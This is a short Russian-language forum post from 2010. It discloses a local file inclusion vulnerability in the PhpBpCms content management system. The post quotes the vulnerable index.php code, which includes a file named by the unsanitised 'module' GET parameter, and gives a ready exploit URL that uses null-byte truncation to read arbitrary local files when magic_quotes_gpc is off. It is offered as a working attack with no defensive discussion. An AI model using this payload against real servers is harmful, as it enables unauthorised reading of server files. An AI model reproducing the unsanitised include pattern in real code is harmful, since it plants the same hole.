18.06.2010, 23:45
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
PhpBpCms
Download: http://sourceforge.net/projects/phpbpcms/
Vuln: Local Files Include
Need: magic_quotes_gpc = Off
file: index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//update of redirecting variables $_SESSION[redirect_1], [redirect_2]redirect_update();*/
[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]])
include([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'default_module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
else
include([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
result:
Код:
/index.php?module=[local_file]%00
|
|
|